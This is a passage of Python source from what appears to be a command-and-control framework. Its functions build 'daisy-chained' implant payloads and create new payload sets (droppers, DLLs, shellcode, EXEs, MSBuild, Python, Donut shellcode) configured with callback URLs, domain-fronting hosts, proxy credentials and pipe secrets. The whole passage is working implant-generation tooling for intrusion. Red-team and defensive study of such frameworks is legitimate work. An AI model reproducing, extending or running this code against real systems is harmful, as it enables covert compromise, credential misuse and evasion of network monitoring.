        newPayload = Payloads(C2[5], C2[2], f"http://{bind_ip}", "", f"{bind_port}", "", "", "", "",
                              proxynone, C2[17], C2[18], C2[19], "%s?d" % get_newimplanturl(),
                              PayloadsDirectory)
        # daisyhost[11] is the domain and [3] the hostname in this row layout.
        newPayload.PSDropper = newPayload.PSDropper.replace(
            "$pid;%s" % upstream_url, "$pid;%s@%s" % (daisyhost[11], daisyhost[3]))
        for build in (newPayload.CreateRaw, newPayload.CreateDlls, newPayload.CreateShellcode,
                      newPayload.CreateEXE, newPayload.CreateMsbuild, newPayload.CreateCS):
            build(name)
        new_urldetails(name, C2[1], C2[3], f"Daisy: {name}", upstream_url, daisyhost[0], "")
        print_good("Created new %s daisy payloads" % name)
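def do_createnewpayload(user, command, creds=None, shellcodeOnly=False):
    """Build a payload set for one or more comms URLs (with matching domain-front hosts).

    Fixes versus the original:
    - When the number of URLs and domain-front hosts differed, the error
      was printed but execution fell through and payloads were still
      generated with mismatched arrays. The handler now returns.
    - The proxy-user format string was shown masked as "******" in the
      listing, which would raise TypeError when formatted with a 2-tuple;
      it is written as Domain\\user, mirroring the interactive prompt
      (confirm against upstream).

    Optional "-credid" selects stored credentials (cleartext password
    required). With `shellcodeOnly` set, only droppers and shellcode are
    produced.

    SECURITY NOTE: the PBind secret and proxy password are typed into the
    console and stored with the URL record in clear.
    """
    params = re.compile("createnewpayload ", re.IGNORECASE).sub("", command)
    creds = None
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
        if not creds['Password']:
            print_bad("This command does not support credentials with hashes")
            input("Press Enter to continue...")
            clear()
            return
    name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
    comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ")
    domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ")
    proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
    pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ")
    pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ")
    comms_url, comms_count = string_to_array(comms_url)
    domainfront, front_count = string_to_array(domainfront)
    # Each URL needs its own host header; bail out instead of pairing them wrongly.
    if comms_count != front_count:
        print("[-] Error - different number of host headers and URLs")
        input("Press Enter to continue...")
        clear()
        return
    proxyuser = ""
    proxypass = ""
    credsexpire = ""
    if proxyurl:
        if creds is not None:
            proxyuser = "%s\\%s" % (creds['Domain'], creds['Username'])
            proxypass = creds['Password']
        else:
            proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
            proxypass = input("Proxy Password: e.g. Password1 ")
        credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ")
        imurl = "%s?p" % get_newimplanturl()
    else:
        imurl = get_newimplanturl()
    C2 = get_c2server_all()
    urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
    newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl,
                          PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename,
                          PBindSecret=pbindsecret)
    prefix = "%s_" % name
    newPayload.CreateDroppers(prefix)
    newPayload.CreateShellcode(prefix)
    if not shellcodeOnly:
        for build in (newPayload.CreateRaw, newPayload.CreateDlls, newPayload.CreateEXE,
                      newPayload.CreateMsbuild, newPayload.CreatePython,
                      newPayload.CreateDonutShellcode):
            build(prefix)
    print_good("Created new payloads")
    input("Press Enter to continue...")
    clear()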